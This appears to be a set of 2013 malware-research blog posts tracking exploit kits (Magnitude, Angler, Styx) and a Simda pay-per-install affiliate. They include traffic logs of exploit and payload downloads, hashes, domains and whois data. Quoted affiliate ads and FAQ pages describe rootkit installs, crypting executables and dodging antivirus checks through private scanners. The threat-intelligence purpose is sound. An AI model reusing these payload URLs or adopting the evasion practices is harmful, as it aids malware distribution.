GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/0
200 OK (text/html) Payload 1 148ae098e23c4844ce25990643cc4150 Stitur

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/1
200 OK (text/html) Payload2 empty

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/2
200 OK (text/html) Payload3 empty

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/3
200 OK (text/html) Payload4 empty

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/4
200 OK (text/html) Payload 5 07b8dafe506e56a40527b96722bf5c70

GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/5
200 OK (text/html) Payload 6 empty

CVE-2013-2551 :

Inside since 2013-10-06

First time i saw it, once decoded, it was copy paste of the code from HiMan EK (the kaf() function in HiMan got my attention for some reasons).

Magnitude EK (formerly popads) has integrated CVE-2013-2551 yesterday. ( HiMan EK copy paste again :S ) pic.twitter.com/s0NslEokhf
— kafeine (@kafeine) October 7, 2013

I won't spend much time on that one.

CVE-2013-2551 successful pass in Magnitude - 2013-10-25

GET http://tpwqihdqrb.2deepinsget .info/?103cacc2431cf5b7bec74b56d3a60444=n11&2550a61eab180c8cfd230ffc41bf33ee=google.com&26f72647ceaa00ff4e35ed5ee16cf9fa=[redacted].com

200 OK (text/html)

Magnitude Landing 2013-10-25
Highlighted the code that will fire in this pass

GET http://tpwqihdqrb.2deepinsget .info/8eab366e152f633afc4eede350c2f657/13cd72e17e6b22c976eeba91c2ab577a.swf

404 Not Found (text/html)

GET http://tpwqihdqrb.2deepinsget .info/8eab366e152f633afc4eede350c2f657/6f1ed403773ad2b9dd44dc0fbcefadef

200 OK (text/html)

Piece of CVE-2013-2551 in Magnitude 2013-10-25

GET http://5.79.85 .237/?eade56046ab80efc3a5dd1dd83f78258

200 OK (text/html) Payload 1 : df1ada88e40a58da18dc4b408600e0a5 Winwebsec

(OT: do : 219.235.1.127GET /api/dom/no_respond/?ts=8aad4fca6d94d7b467bbaed2d1747d2e5a1cb210&token=sysdocx1&group=asp&nid=264D4000&lid=0058&ver=0058&affid=76900&dx=0 HTTP/1.1 <-- FakeAV : Winwebsec )

GET http://5.79.85 .237/?4c9a37a894f9cee76c89df68f4c18615

200 OK (text/html) Payload 2 : 4b9c8466cae1da89923ac89eca79db2a (Kelihos Spambot)

GET http://5.79.85 .237/?8dc8e224de9248e8e1cb72ceac8a5599

200 OK (text/html) Payload 3 : 2188d6a0d622d23a9c9bb7208a9f388c (Kelihos Spambot ..again (?!?) )

GET http://5.79.85 .237/?28847bf8f7c082fcd967ac01dbaec03e

200 OK (text/html) Payload 4 (empty)

GET http://5.79.85 .237/?cf20e7e042371ed8b65339bbd931e8b3

200 OK (text/html) Payload 5 : 0ac65603f3519ac09187b35df203905f Zaccess

GET http://5.79.85 .237/?ac339e60d0e6eeb0e5a1caa4d11c2fe5

200 OK (text/html) Payload 6 (empty)

(In some configuration you can get the Java call...but most of the time you'll have an IE crash before)

CVE-2013-0634 (?) :

If so inside since at least 2013-03-22

CVE-2013-0634 (?) CVE Path

GET http://vedktnyo.3deepinsget
.info/?c372e0cf1d9e9ec9b56349796a1ceb22=34
200 OK (text/html)

GET http://vedktnyo.3deepinsget .info/12db6830c13debce138ba17130b7115a/100b9090c5f6d6577b33fb8ece0c4d45.swf
200 OK (application/x-shockwave-flash) 3f4261ccc6edb559e623906472d5cd2f So CVE-2013-0634 (?)...Can't figure this out for sure. Help would be greatly appreciated :)
Sample and Associated Fiddler (Owncloud)

GET http://vedktnyo.3deepinsget .info/12db6830c13debce138ba17130b7115a/882173c54e09bf0968cbda6b32c1d145
200 OK (text/html) CVE-2013-2551 (see before)

GET http://gabetiznol .info/calculator.exe
200 OK (text/html) aeaf204a9e5e6dd55d2a85ae1b7a0dd1

------
Off Topic Payload :

74.86.20.50 http://twinkcam .net/images/s.php?id=92.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
36351 | 74.86.0.0/16 | SOFTLAYER | US | SOFTLAYER.COM | SOFTLAYER TECHNOLOGIES INC.

216.17.105.36 http://cinnamyn .com/images/s.php?id=92.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

30266 | 216.17.104.0/21 | A1COLO-COM | US | A1COLO.COM | A1COLO.COM
74.86.20.50 http://saggerboy .com/twg/b.php?id=92.1
User-Agent: Mozilla

Want to know more? S!ri's posts about it
--------

<edit1 2013-11-07>
After around 8 hours of maintenance where thread link were replying with a "stoptraff" Magnitude is back with small changes.

Magnitude Landing change on 2013-11-07

</edit1>

Exploitation Graph :

Magnitude Exploitation Graph
2013-10-26

To simplify : No plugin-detect. Your browser is being told to gather all the bullets...those that does not fit (User-Agent server side check) are then refused to him.

Thanks : Chris Wakelin and Will Metcalf

↧

CVE-2013-2551 and Exploit Kits

November 1, 2013, 2:38 am

≫ Next: Inside a (The?) Simda Affiliate : Партнёрка Podmena (formerly Chesto)

≪ Previous: Magnitude EK : Pop Pop !

A late post to sum up what has been seen in Exploit Kits regarding that CVE-2013-2551.
This vulnerability has been exploited during Pwn2Own 2013 by VUPEN the 2013-03-07

First mention was by Yonathan Klijnsma from Fox-IT for Neutrino on 2013-09-10.

Neutrino exploit kit now also serves @VUPEN's #CVE-2013-2551 to exploit MSIE 10-9-8-7-6 via the VML integer overflow @kafeine
— Yonathan Klijnsma (@ydklijnsma) September 10, 2013

Malforsec wrote a post about it.
I never get a positive infection with it.

Simultaneous pass on 2 threads of Neutrino
2013-09-14 - Piece of CVE-2013-2551

On 2013-09-25 Yonathan spotted it in Fiesta.

Fiesta exploit kit now also serves @VUPEN's #CVE-2013-2551 to exploit MSIE 10-9-8-7-6 via the VML integer overflow
— Yonathan Klijnsma (@ydklijnsma) September 25, 2013

and made a post about it. Once again I could see it fired but not owning box here. Don't know why.

Fiesta pass firing CVE-2013-2551 (no infection)
2013-10-05

On 2013-10-01 I spotted it on HiMan Exploit Kit, where i saw it working properly.

HiMan Exploit Kit.Say Hi to one more. Working CVE-2013-2551 inside : http://t.co/rDiEDKjsGY pic.twitter.com/5d4PJw9Jn9
— kafeine (@kafeine) October 2, 2013

On 2013-10-05 it was being integrated in Styx

CVE-2013-2551 integration is in progress in Styx (HiMan copy paste for that CVE...hum...%$*£ !! ) pic.twitter.com/OTsx0ZqsB3
— kafeine (@kafeine) October 5, 2013

The code was exactly the same as the one in HiMan EK (the kaf() was the hint that allow me to fast notice it)

On 2013-10-06 it appeared in Magnitude :

Magnitude EK (formerly popads) has integrated CVE-2013-2551 yesterday. ( HiMan EK copy paste again :S ) pic.twitter.com/s0NslEokhf
— kafeine (@kafeine) October 7, 2013

On 2013-10-13 I saw it in Nuclear Pack

Nuclear Pack is integrating CVE-2013-2551 (once again, copy paste from HiMan EK's code :s ) pic.twitter.com/L97uZy4xFp
— kafeine (@kafeine) October 13, 2013

<edit1 2013-11-09>
Sweet Orange :
Spotted by EKWatcher, it's now in Sweet Orange.

Landing size double from :

Sweet Orange - 2013-11-09 02:51

Sweet Orange - 2013-11-09 14:48

GET http://kytus.allseasoninvesting .com:6173/order_temp/sshadmin/lol/amazon.php?english=3
200 OK (text/html)

GET http://bafes.thienchualatinhyeu .com:6173/members.php?files=588&quote=291&pets=4&sales=199&star=171&front=343&staff=37&virus=398&mail=378
200 OK (application/octet-stream) 0b17503fe267660f08d1bc23fa89cb8d <- Urausy

Urausy - Piece of BE Design 2013-11-09

</edit1>

Files : Here some fiddler (Owncloud via Goo.gl)

Read More :
Fiesta Exploit Kit analysis serving MSIE exploit CVE-2013-2551 - 2013-09-27 - Yonathan Klijnsma
Neutrino EK - IE exploit analysis - 2013-09-17 - Malforsec
CVE-2013-2551 MS13-037 Internet Explorer Vulnerability Metasploit Demo - 2013-06-12 - Eromang Blog
VUPEN Advanced Exploitation of Internet Explorer 10 / Windows 8 Overflow (Pwn2Own 2013) 2013-05-22 - Nicolas Joly - Vupen

↧

Inside a (The?) Simda Affiliate : Партнёрка Podmena (formerly Chesto)

November 6, 2013, 1:14 pm

≫ Next: CVE-2013-0074 (Silverlight) integrates Exploit Kits

≪ Previous: CVE-2013-2551 and Exploit Kits

Simda being distributed in Affiliate mode can be found via many different infection vectors.
But it's the only payload of what I call "Styx Kein"

First mention of this Styx "instance" I found comes from the wizard behind KahuSecurity :
Analyzing a New Exploit Pack - 2012-08-15
This is where "Kein" comes from. (based on Domains used by this EK)

Styx "Kein" 2013-03-02
Could also be refered as www312

Styx "Kein" 2013-03-30
(here first call www3. is missing)
Note the domain name

When I wrote about Styx one year ago :
Crossing the Styx ( Styx Sploit Pack 2.0 ) - Meet CVE-2012-4969 via JS - 2012-12-22
many noticed the similarities between Styx and Kein.

We can find 2 different kinds of landing for "Styx Kein".

- One titled "Sex Scandals" and featuring EmmaWatson or Paris Hilton then a fake flash player update

Two Styx Kein Landings - 2013-11-05
("Sex Scandals")

Styx Kein "Sex Scandals" pass + Social Engineering
2013-11-05
(plugin detect in separate call)

0b80023884a167ebee695837aae4705a <- Payload.

and the other one more in line with "standard" Styx featuring Yahoo Trends and now Yahoo Stocks

Styx Kein Landing - 2013-10-10

Styx "Kein" Yahoo stocks.
2013-11-05
(plugin detect in landing)

18e3389900a3f6db5c4acfa186a55012 <-- Payload

Payload is always Simda. We can see that it's the same stuff in a different flavor (in one case more adult/soc-eng)

(for those who wants to compare, here is a more "standard" Styx :

Styx Pushing Shylock
2013-10-24
See jar with Random data

)

I won't study the Styx "Kein" in details (at least for know).
Exploitation graph should be not far from the one in Styxy Cool (+ CVE-2013-2472 (?) click2play bypass + CVE-2013-2465 + CVE-2013-2551 + some soc-eng)

So ?

Say Hello to Podmena 2014
Подмена mean Substitution

podmena2014.com

188.138.1.170

8972 | 188.138.0.0/17 | PLUSSERVER | DE | INTERGENIA.DE | INTERGENIA AG

Whois :
-----------
Domain name: podmena2014.com
Registrar: Regtime Ltd.
Creation date: 2013-09-25
Expiration date: 2014-09-25

Registrant:
Mahmud Perlov
Email: muhameho@mail.cc
Organization: private person
Address: Voronova 37-48
City: Hohlovka
State: Voronezskaja
ZIP: 589382
Country: RU
Phone: +7.4958293920

-----------

Advert :

Podmena 2014 Advert on Underground Forum

Original Text :
------------------------------------------
Подмена выдачи Podmena2014/До 500$ с 1к US/Связка+, Платим с 2009 года. С нами надёжно
--
НОВШЕСТВА
• ДОХОД ДО 500$ C 1K хороших US загрузок за 2 мес
• ДАЁМ КАЧЕСТВЕННУЮ СВЯЗКУ

ПРЕИМУЩЕСТВА
• МЫ ПЛАТИМ С 2009 года
• НОВАЯ СХЕМА КОНВЕРТА КЛИКОВ
• РАБОТАЕМ НА ПРЯМУЮ С ФИД ПРОВАМИ
• ЕСТЬ ВЫПЛАТЫ ПО ЗАПРОСУ
• ОСОБЫЕ УСЛОВИЯ КРУПНЫМ КЛИЕНТАМ
• ТИХИЙ И ЖИВУЧИЙ БОТ
• ПРИНИМАЕМ ВСЁ, КРОМЕ СНГ И КИТАЯ

КОНТАКТЫ
• САППОРТ
◦ JABBER chesto-support@jabba.biz

◦ ICQ 983-382

◦ * В сети 24 часа

• МЕНЕДЖЕР
◦ JABBER cesto@thesecure.biz

◦ ICQ 444-846

РЕГИСТРИРУЙТЕСЬ

http://podmena2014.com/?registration
Промо инвайт на октябрь - d3d9446802a44259755d38e6d163e820

* Данный софт, новая версия многим известной CHESTO
[Redacted]
* Данный софт является adware и не является вредоносным по
------------------------------------------
Translated by google as :
------------------------------------------
The substitution issue Podmena2014/Do $ 500 to 1k US / Bundle +, a plateau since 2009. With us safely
--
INNOVATION
• INCOME UP TO 500 $ C 1K good US downloads 2 months
• MAKE A BUNCH OF QUALITY

BENEFITS
• WE PAY Since 2009
• NEW SCHEME CLICK THE ENVELOPE
• Works directly with the PID of Provo
• PAYMENT IS ON REQUEST
• SPECIAL CONDITIONS OF MAJOR CUSTOMERS
• QUIET AND tenacious BOT
• TAKE ALL EXCEPT THE CIS AND CHINA

CONTACTS
• support service
◦ JABBER chesto-support@jabba.biz

◦ ICQ 983-382

◦ * Online 24 hours

• MANAGER
◦ JABBER cesto@thesecure.biz

◦ ICQ 444-846

JOIN

http://podmena2014.com/?registration
Promo Invite for October - d3d9446802a44259755d38e6d163e820

* This software, new versions of many well-known CHESTO
[Redacted]
* This software is adware , and is not harmful for
------------------------------------------
For the records, Chesto Ad was like :
------------------------------------------
12.06.2011, 13:47
Подмена выдачи "ChESTO V2" - 3й год работы и V2 п
-
Вы сидите за компьютером и читаете, а кто-то сейчас отдыхает?
Многие уже сделали загрузки выгодной партнерки и видят, что деньги капают каждый день!

В честь того, что нам исполнилось 2 года, выпускается обновленный софт партнерки, нацеленный на то, чтобы мы с вами отметили и 5й и 10й юбелей с кучей бабла smile.gif

Что нового в ChESTO v2?

[+] Партнерские отчисления теперь до 20%!
[+] Увеличен отстук экзе, есть данные об отклике 80-90%
[+] Доходность до 300$ за 30 дней с 1к хороших US загрузок
[+] У нас есть боты с 2009г, теперь еще больше увеличили живучесть экзе
[+] Ну очень тихая работа бота в системе
[+] Много небольших доработок в скриптах и экзе

Почему именно партнерка "ChESTO"?

[+] Подмена выдачи приносит постоянный доход, каждый день
[+] Вместе с нашим ботом можете грузить что угодно, хоть зевса, хоть антивирус
[+] Раз сделали несколько кило загрузок, и каждый день получаете до 200 баксов и больше*
[+] Боты живут не то, чтобы вечно, но реально долго приносят вам деньги
[+] Автоматические выплаты на ваш кошелек Webmoney 2 раза в месяц, без холда
[+] Делаются автоматические чистки бота от антивирусов, каждые 6 часов
[+] Особые условия если делаете много загрузок
[+] Более 2 лет стабильной работы партнерки. Идет постоянная работа над увеличением доходности

* Доход зависит от качества загрузок и количества
** Мы принимаем любые загрузки стран: US, AU, CA, GB
*** Пускаем в партнерку не всех, по собеседованию в аське, пишите

Скрины стат за платежный период (доход / потенциальный доход)
Свежие
518$ / 2402$ - 01.06-12.06.2011
http://s55.radikal.ru/i147/1106/38/cf712c1b6f07.jpg
330$ / 1386$ - 01.06-12.06.2011
http://s05.radikal.ru/i178/1106/f0/f5e1dc42ce43.jpg

1225$ / 6367$
http://s39.radikal.ru/i086/1106/63/99aa3d4eda74.jpg
1604$ / 3597$
http://s42.radikal.ru/i096/1106/f1/45b58e477915.jpg
508$ / 2308$
http://s45.radikal.ru/i107/1106/7a/b529250b629d.jpg
1095$
http://i074.radikal.ru/1106/6d/b1cc7a29a101.jpg
2224$
http://s46.radikal.ru/i112/1106/fc/f95fb51937bc.jpg

... можно и дальше расхваливать и обсуждать софт, но пока реально не увидишь его в работе, не узнаешь, насколько выгодно
------------------------------------------
Translated by google as :
------------------------------------------
12.06.2011, 13:47
The substitution issue "ChESTO V2" - the third year of operation and V2 n
-
You sit at your computer and read , and someone is on a break ?
Many have already done downloading profitable affiliate program and see that the money is dropped every day!

In honor of the fact that we are 2 years old , released updated software affiliate program , which aims to ensure that we are pointed and 5th and 10th yubeley with a bunch of dough smile.gif

What's new in ChESTO v2?

[+ ] Affiliate payments are now up to 20 % !
[+ ] Increased otstuk eczema , there are data on the response of 80-90 %
[+ ] Yield of up to $ 300 within 30 days from 1k good US downloads
[+ ] We have boats since 2009 , is now further increased survivability of eczema
[+ ] Well, very quiet operation robot system
[+ ] Many small improvements in the scripts and eczema

Why affiliate "ChESTO"?

[+ ] The substitution issue brings a steady income every day
[+ ] With our bot can ship anything, even Zeus , though antivirus
[+ ] Once did a few pounds downloads and every day get up to $ 200 or more *
[+ ] Bots live not that forever , but really long time bring you money
[+ ] Automatic payment on your purse Webmoney 2 times a month , without hold
[+ ] Do automatic cleaning robot from antivirus every 6 hours
[+ ] Special conditions if you do lots of downloads
[+ ] More than 2 years of stable work affiliate . Is constantly working to increase the profitability of

* Income is dependent on the quality and quantity of downloads
** We accept all downloads of : US, AU, CA, GB
*** Allowed into the affiliate is not all , after an interview in ICQ , e-mail

Stat screens per pay period ( profit / revenue potential )
fresh
$ 518 / $ 2402 - 01.06-12.06.2011
http://s55.radikal.ru/i147/1106/38/cf712c1b6f07.jpg
$ 330 / $ 1386 - 01.06-12.06.2011
http://s05.radikal.ru/i178/1106/f0/f5e1dc42ce43.jpg

$ 1225 / $ 6367
http://s39.radikal.ru/i086/1106/63/99aa3d4eda74.jpg
$ 1604 / $ 3597
http://s42.radikal.ru/i096/1106/f1/45b58e477915.jpg
$ 508 / $ 2308
http://s45.radikal.ru/i107/1106/7a/b529250b629d.jpg
$ 1095
http://i074.radikal.ru/1106/6d/b1cc7a29a101.jpg
$ 2224
http://s46.radikal.ru/i112/1106/fc/f95fb51937bc.jpg

... you can continue to praise and discuss the software, but still do not really see how it works, do not know how profitable
------------------------------------------

Now here is how it looks inside :

Podmena2014 - News

Original text of the News (fresher than the screenshot) :
------------------------------------------

2013-10-31 11:14:34

Обновлён скрипт для подтягивания юрла связки, просьба всем обновить его у себя. Теперь скрипт учитывает возможность нештатной ситуации при обновлении линка и если что, пересылает траф на предыдущий линк, пишет в лог Redirect to last url.

2013-10-29 14:58:42

Сервера обновлены, всё готово. Можно лить по максимуму

2013-10-29 14:24:24

Переустанавливаем софт на серверах. Сегодня возможны перебои в работе линков и обновления статы. Мы внедряем обновления экзе, которые увеличят живучесть. Скорее всего сегодня вечером или завтра до обеда будет готово.

2013-10-23 20:28:59

Обновлён скрипт для подгрузки актуального линка на связку. Рекомендация всем обновить свой скрипт. Так же, обновлен раздел инфо

2013-10-23 15:24:40

Продолжаем совершенствовать софт. Ряд фиксов в экзе и связке, что повысило отстук

2013-10-21 16:40:03

Сегодня выпущена новая версия экзе. Софт усовершенствован, повысился отстук, сделаны несколько фиксов, оптимизирована работа, что повысит доходность

2013-10-18 16:06:07

Добавлен удобный скрипт для обновления актуального домена связки. Смотрите промо

------------------------------------------

Translated by google as :

------------------------------------------

2013-10-31 11:14:34

Updated script to pull yurla ligament, please update it all for himself. The script takes into account the possibility of contingency when updating link and if that sends cores to the previous link , writes to the log Redirect to last url.

2013-10-29 14:58:42

Server upgraded, you're done. You can pour the maximum

2013-10-29 14:24:24

Reinstall the software on the servers. Today, possible disruptions links and update the stats . We implement updates eczema , which increased vitality. Most likely tonight or tomorrow before dinner is ready..

2013-10-23 20:28:59

Continue to improve the software. A number of fixes in eczema and bundle, which increased otstuk

2013-10-23 15:24:40

Продолжаем совершенствовать софт. Ряд фиксов в экзе и связке, что повысило отстук

2013-10-21 16:40:03

Today released a new version of eczema . Software refined rose otstuk , made several fixes , improved performance of that increase profitability

2013-10-18 16:06:07

Added handy script to update the current domain ligament. See promo

Podmena2014 - Stats
(note : Column Реферральные has now been removed)

Text for Statistics :
------------------------------------------
Показана статистика за период 2013.10.[r] - 2013.10.[r] для [redacted]
Статистика обновлена 2 мин назад

* Бот разгоняется по деньгам в течении 3х дней
* Окончательная стата по деньгам в течении 5 суток (основная стата на следующий день)
* Лейте побольше US загрузок, это принесет вам в десятки раз больше денег

XML статистика
------------------------------------------
Google translate as :
------------------------------------------
Shows the statistics for the period 2013.10.[r] - 2013.10.[r] to [redacted]
Statistics last updated 2 minutes ago

* Boat accelerates the money within 3 days
* Final stat on the money within 5 days (the main article the next day)
* Pour more US downloads, it will bring you ten times more money

XML statistics
------------------------------------------

Podmena2014 - XML Stats

Podmena2014 - Promo

Text for Promo :
------------------------------------------
Установщик

http://podmena2014.com/update.php?name=[redacted]&ukey=[redacted]
* С этой ссылки качайте экзе на свой сервер. Куда-либо "светить"эту ссылку запрещено
* Содержит Rootkit для x64 и хороший инсталл может жить до года
* Скачать экзе можно только раз в 10 минут
* Желательно обновлять экзе каждые 3 часа
* Если вы пользуетесь связкой, то вам этот файл не нужен. Там он уже стоит.
* Для скана экзе пользуйтесь только приватными сервисами типа http://scan4you.net

Exe обновлен: 18 мин назад
Exe_MD5: [redacted md5]

Связка

Получить актуальный линк на связку
* Домен обновляется каждые 1-3 часа, обязательно перетягивайте линк каждые 5 минут, предыдущий домен сразу же отключается, остаётся работать только текущий.
* По этой ссылке будет содержаться актуальный адрес связки, подтягивайте его к себе на сервер нашим скриптом или сами
* Лейте только УНИКОВ, неуники блокируются. По странам всё, кроме СНГ и Китая
* Средний пробив около 10%, на хорошем трафе до 15-20%. Если у вас меньше, полейте браузер IE x32 уники
* Скрипт для подтягивания линка на ваш сервер. Закачайте к себе этот скрипт в открытую на запись папку и лейте на него траф, он всё делает автоматически, обновляет линк каждые 5 минут.

------------------------------------------
Google translate:
------------------------------------------

http://podmena2014.com/update.php?name = [redacted] & ukey = [redacted]

* With this reference swing eczema on your server. Anywhere "shine " this link is prohibited

* Contains a Rootkit for x64 installs and good to live up to the year

* Download eczema can be only once in 10 minutes

* It is advisable to update eczema every 3 hours

* If you use a bunch , you will not need this file . There he was standing .

* To scan eczema only use private services like http://scan4you.net

Exe updated : 18 minutes ago

Exe_MD5: [redacted md5]

ligament

Get up- link to the bundle

* Domain is updated every 1-3 hours , be sure to tighten link every 5 minutes , the previous domain will be stopped immediately , there is only the current work .

* This link will contain the current address of the bunch, tighten it to your server or our own script

* Pour the only uniques , neuniki blocked . All of the countries except CIS and China

* Average breaking about 10%, on a good trafe up to 15-20 %. If you have less water the browser is IE x32 Unica

* Script to pull link to your server. Upload the script to myself this out in the open on the record folder, and pour it on the cores , it does everything automatically updates the link every 5 minutes.

------------------------------------------

The PHP Script : http://pastebin.com/5Ha9wYD0

The "update.php" link is for third party Exploit Kit (which will handle the download).

And the script is for Iframe (go check the link every 5 minutes) and store landing locally.

Podmena2014 - Settings

Podmena2014 - Payment

Podmena2014 - part of Faq

Text for FAQ :
------------------------------------------

Поддержка
Jabber: chesto-support@jabba.biz
ICQ: 983382

Менеджер
Jabber: cesto@thesecure.biz
ICQ: 444846

Формат доходности для подмены
Например, вы слили 1к US установок. Видите в стате 2$ за день, в течении недели доход разгоняется до 8$. В течении 2 месяцев получается 60*8 = 480$ и продолжает капать

Загрузки
Принимаем любые страны, кроме СНГ и Китая
При этом, максимум дохода даёт US
Хороший доход с AU CA AG SG MC
Остальные страны, тоже, что-то да приносят.

Связка
В промо вы увидите линк на актуальный линк связки, а так же скрипт, которым удобно подтягивать актуальный линк, стоит подтягивать юрл каждые 5 минут.
Лейте только УНИКОВ, неуники блокируются. По странам всё, кроме СНГ и Китая
Домены меняем, комплект связки хороший, чистится всё автоматически. Стата по связке появится в статистике. Домен обновляется, в среднем, каждые 1-3 часа, так что перетягивайте линк каждые 5 минут, предыдущий домен сразу же отключается, остаётся работать только текущий.
Стастистика по связке обновляется каждые 5-10 минут
Связка самописная, в основном ява
Лучше всего лить х32 машины (х64 бьются не всегда). Браузер IE x32, ОС любая, XP конечно лучше бьётся.
Средний пробив около 10%, на хорошем трафе до 15-20%

Почему следует лить именно нам?
С нами вы получаете надёжность. Мы платим с 2009 года и пусть мы не обещаем космические доходы от загрузок, при этом мы можем платить годами, пока другие партнерки закроются. Для примера, какая то партнерка платит 1000 баксов в месяц, партнерка проработала 6 месяцев и принесла 6000. На тех же загрузках у нас, например, 800 баксов, при этом мы можем платить 2 года и вы получите 19200. Хотя вроде бы кажется что конверт был меньше?
С нами вы надёжно получаете свои деньги длительное время и этим выигрываете.

Выходные и праздники
По выходным и праздником люди кликают меньше, соответственно и доход меньше.

Выплаты
Выплаты автоматом каждые 2 недели в 3го и 18го числа.
Если у вас сумма больше 200$ в день - сделаем выплату по запросу в течении 2 дней
Минимальная выплата 50$.

Обновление статистики
Статистика по деньгам уточняется до 5 дней (это зависит от фид провайдеров). При этом, основная часть денег на балансе уже на следующие сутки
Статистика а админке по установкам, перетягивается каждые 30 минут.
Статистика по связке каждые 5-10 минут.

Экзе файл
Софт тихий, в системе держится хорошо, юзеру не мешает.
Содержит Rootkit для x64 и хороший инсталл может жить до года
Экзе обновляем каждые 3 часа - время обновления криптера может быть произвольным. Стараемся по мере возможностей держать его чистым.
Запрещено сканировать файл пабликовыми АВ чекерами, типа VirusTotal. Пользуйтесь приватными сервисами, типа http://scan4you.net

Как получить максимальный доход
Лейте хороший, качественный трафик
Одновременно с нами, желательно, не лить другие партнерки
Лейте побольше US загрузок

------------------------------------------
Google translate:
------------------------------------------
support
Jabber: chesto-support@jabba.biz
ICQ: 983382

manager
Jabber: cesto@thesecure.biz
ICQ: 444846

The format of return for substitution

For example, you have merged US 1k units. You see in the article $ 2 per day , for a week income boosted to $ 8. Within 2 months turns 60 * 8 = $ 480 , and continues to drip

Downloads

Accept any country other than the CIS and China
Thus , the maximum yield gives US
Good income from AU CA AG SG MC
Other countries , too, so bring something .

Exploit Kit

In the promo you will see a link to the actual link ligaments, as well as the script that is easy to pull up- link , is to pull yurl every 5 minutes.
Leyte only Unico , neuniki blocked . All of the countries except CIS and China
Domains change , set a bunch of nice , clean all automatically. Articles on bond will appear in the statistics. The domain is updated , on average, every 1-3 hours, so overtighten link every 5 minutes , the previous domain will be stopped immediately , there is only the current work .
Stastistika by a bunch of updates every 5-10 minutes
Samopisnaya bunch , mostly java
It is best to pour x32 machines (x64 struggling at times). Browser IE x32, any OS , XP is certainly better beats .
Average sample of about 10 % , on a good trafe up to 15-20 %

Why should we cast it ?

With us, you get the reliability . We pay since 2009 and even though we do not promise space revenues from downloads , and we can not pay for years, while others will close affiliate . For example , some sort of affiliate program pays $ 1,000 a month, affiliate worked for 6 months and brought 6000 . At the same batches have , for example, $ 800 , and we can pay the 2 years and you get 19,200 . Although it seems like that the envelope was smaller?
With us you will surely get your money for a long time and this win .

Weekends and holidays

On weekends and holiday people click less , respectively, and less income .

payments

Payments are automatically every 2 weeks in the third and 18th numbers.
If you have a sum of more than $ 200 a day - will make the payment on request within 2 days
The minimum payout is $ 50.

update statistics

Statistics on money specified to 5 days (depending on the feed providers) . At the same time , most of the money on the balance sheet is already on the next day
Statistics and admin for the settings , overtighten every 30 minutes.
Statistics on the bond every 5-10 minutes.

eczema file

Soft quiet, the system is holding up well , the user does not interfere.
Contains Rootkit for x64 installs and good to live up to the year
Eczema update every 3 hours - time updates kripter can be arbitrary. We try wherever possible to keep it clean .
Forbidden to scan the file pablikovymi AV checker, type VirusTotal. Use private services , such as http://scan4you.net

How to get the maximum income

Leyte good quality traffic
Along with us , it is advisable not to pour other affiliate
Pour more US downloads------------------------------------------

Now you know what to expect when you see a >900ko file named pod.exe :)

But to be honest I wonder if I now have not more questions than answers.

The Podmena is tied to the Styx "Kein""Yahoo Stocks" landing (maybe to the other. Didn't see it myself)
I can't say for sure it's the only Affiliate pushing that stuff.
What are the link between Styx/Styx Kein? We know there are many options in Styx to do exactly what is being done by this Affiliate. The API seems powerful.

We could talk about CVE appearance order in different instances of Styx but i guess you are already bored enough :)

Read More :
Styx Exploit Kit installing Simda - 2013-10-08 - Jose Miguel Esparza - Eternal-Todo

MSRT September 2013 - Win32/Simda - 2013-09-10 - Microsoft

A "Styxy" Cool EK ! - 2013-07-01

Inside Styx Sploitpack 4.0 - Exploit Kit Control Panel 2013-05-19

Crossing the Styx ( Styx Sploit Pack 2.0 ) - Meet CVE-2012-4969 via JS heapspray - 2012-12-22

↧

CVE-2013-0074 (Silverlight) integrates Exploit Kits

November 13, 2013, 2:14 pm

≫ Next: MagicTraffic : a look inside a Zaccess/Sirefef affiliate

≪ Previous: Inside a (The?) Simda Affiliate : Партнёрка Podmena (formerly Chesto)

Angler EK is definitely on the move. It's not a huge surprise when we can speculate that the team behind is the same that was first using Cool EK (Paunch VIP customer) and is behind the Reveton threat.

After integrating CVE-2013-0634 past week

Angler EK's first move on 2013-11-05. Spotted by @node5 and @EKWatcher : CVE-2013-0634. Confirmed by @timohirvonen pic.twitter.com/HOvpqhW0qm
— kafeine (@kafeine) November 7, 2013

EKWatcher has spotted a new change today : the silverlight check has now been activated and deliver an exploit.

Looks like "Angler EK" is including a Silverlight Exploit - in preference to ones for vulnerable Flash and Java
— Chris Wakelin (@EKwatcher) November 13, 2013

Pedro Marinho from Emerging Threats pointed links with Packet Storm Exploit 2013-1022-1 - Microsoft Silverlight Invalid Typecast / Memory Disclosure

(right now I don't understand why CVE-2013-3896 is mentionned here. Will update if I learn about it)

CVE-2013-0074 pass in Angler EK :

CVE-2013-0074 successful pass in Angler EK
2013-11-13

Silverlight 5.1.10411.0 Addon In IE used in that pass

Note: I made a pass with Silverlight 5.1.20513.0 - as fire condition told us : safe.

GET http://peragretisque.yevgenimalkin .com/leoccvkead
200 OK (text/html)

Sliverlight version checks
Angler EK 2013-11-13

Deciding if Silverlight must be fired : "sterlings"
in Angler - 2013-11-13

Call for Silverlight Exploit in Angler 2013-11-13

GET http://peragretisque.yevgenimalkin .com/0leoccvkeadmnp
200 OK (text/html)

Silverlight Call

Content of that zip

Dll TimeStamp

The DLL ( 5f36a4c019d559f1be9fdd0cd770be2e ) would be worth some works but as often, I do not have the knowledge right now to provide useful data. Will link analysis that may come.

GET http://peragretisque.yevgenimalkin .com/1leoccvkeadmnp
200 OK (application/octet-stream) Xored Reveton Ransomware.

One of the US Reveton Design
2013-11-13

Firefox ?

